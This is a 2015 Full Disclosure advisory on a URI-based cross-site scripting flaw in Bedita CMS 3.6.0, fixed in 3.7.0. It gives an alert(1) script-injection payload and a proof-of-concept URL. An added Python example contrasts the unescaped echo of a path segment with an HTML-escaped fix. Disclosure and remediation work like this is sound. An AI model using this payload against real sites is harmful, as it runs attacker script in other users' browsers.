[FD] Bedita 3.6.0 – Cross-Site Scripting Vulnerability
- To: fulldisclosure@xxxxxxxxxxxx
- Subject: [FD] Bedita 3.6.0 – Cross-Site Scripting Vulnerability
- From: CSW Research Lab <disclose@xxxxxxxxxxxxxxxxxxxxxx>
- Date: Sat, 12 Dec 2015 20:24:41 +0530
================================================================
Bedita 3.6.0 – Cross-Site Scripting Vulnerability
================================================================
Information
**********************
Vulnerability Type : Cross Site Scripting Vulnerability
Vulnerable Version : 3.6.0
Severity: Medium
Author – Arjun Basnet
CVE-ID: N/A
Homepage: http://www.bedita.com/
Description
***********************
Bedita is prone to a URI-based cross-site scripting vulnerability because it
fails to sanitize user-supplied input. An attacker may leverage this issue
to execute arbitrary script code in the browser of an unsuspecting user of
the affected site.
Proof of Concept URL
***************************
[+] http://localhost/bedita/beditaapp/pages/showObjects/2/0/0/leafs"><script>alert(1);</script>
Affected URL
*****************
[+] http://localhost/bedita/beditaapp/pages/showObjects/2/0/0/leafs
Payload
=======================
"><script>alert(1);</script>
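The following Python is an added illustration, not Bedita's code and not part of the advisory. It models the pattern the description calls out: the trailing path segment of the showObjects URL is echoed into an HTML attribute, so the advisory's payload closes the attribute and opens a script tag; the same template with HTML entity encoding on output renders the payload as inert text. The route prefix, the page template, and every function name below are assumptions constructed for the example.

```python
"""Added example (not Bedita's code): reflected, URI-based XSS from an
unescaped path segment, beside the output-encoded fix.

Everything here (route prefix, template, helper names) is constructed for
illustration; only the URL shape and payload come from the advisory."""
import html
from html.parser import HTMLParser
from urllib.parse import quote, unquote, urlsplit

# Route prefix from the advisory's affected URL (assumed to be how the
# application splits the path; the real router is not modelled here).
ROUTE_PREFIX = "/bedita/beditaapp/pages/showObjects/2/0/0/"

# Payload quoted in the advisory, and the PoC URL built from it the way a
# browser would send it (percent-encoded in the request line).
ADVISORY_PAYLOAD = '"><script>alert(1);</script>'
POC_URL = "http://localhost" + ROUTE_PREFIX + "leafs" + quote(ADVISORY_PAYLOAD)


def route_parameter(url: str) -> str:
    """Return the decoded path remainder after ROUTE_PREFIX (the 'leafs' value)."""
    path = unquote(urlsplit(url).path)
    if not path.startswith(ROUTE_PREFIX):
        raise ValueError("URL does not match the showObjects route")
    return path[len(ROUTE_PREFIX):]


def render_vulnerable(segment: str) -> str:
    """Echoes the segment into an attribute verbatim: the defect the advisory describes."""
    return f'<a href="{ROUTE_PREFIX}{segment}">next</a>'


def render_fixed(segment: str) -> str:
    """Same template, but the segment is entity-encoded for an HTML attribute context."""
    safe = html.escape(segment, quote=True)  # encodes & < > " '
    return f'<a href="{ROUTE_PREFIX}{safe}">next</a>'


class _ScriptTagCounter(HTMLParser):
    """Counts <script> start tags the way a browser's tokenizer would see them."""

    def __init__(self) -> None:
        super().__init__()
        self.scripts = 0

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.scripts += 1


def script_tag_count(markup: str) -> int:
    """Oracle for the test: how many live <script> tags the rendered page contains."""
    parser = _ScriptTagCounter()
    parser.feed(markup)
    parser.close()
    return parser.scripts


if __name__ == "__main__":
    param = route_parameter(POC_URL)
    print("vulnerable:", render_vulnerable(param), script_tag_count(render_vulnerable(param)))
    print("fixed:     ", render_fixed(param), script_tag_count(render_fixed(param)))
```

The fix is output encoding at the point of insertion, not input filtering: `html.escape(..., quote=True)` neutralises the `"` that closes the attribute as well as the angle brackets, so the same template is safe regardless of what arrives in the path, and a benign value such as `leafs` renders identically in both versions.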
Advisory Information:
================================================
Bedita CMS XSS Vulnerability
Severity Level:
=========================================================
Medium
Description:
==========================================================
Vulnerable Product:
[+] Bedita 3.6.0
Advisory Timeline
************************
14-Oct-2015 - Reported
14-Oct-2015 - Vendor response
11-Dec-2015 - Vendor released fixed version
12-Dec-2015 - Publicly disclosed
Fixed Version:
*****************
[+] Bedita 3.7.0 (http://www.bedita.com/home-be/be-download-2)
Reference
*****************
[+] https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
Credits & Authors
************************
Arjun Basnet from Cyber Security Works Pvt. Ltd. (http://cybersecurityworks.com)
--
----------
Cheers !!!
Team CSW Research Lab <http://www.cybersecurityworks.com>
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/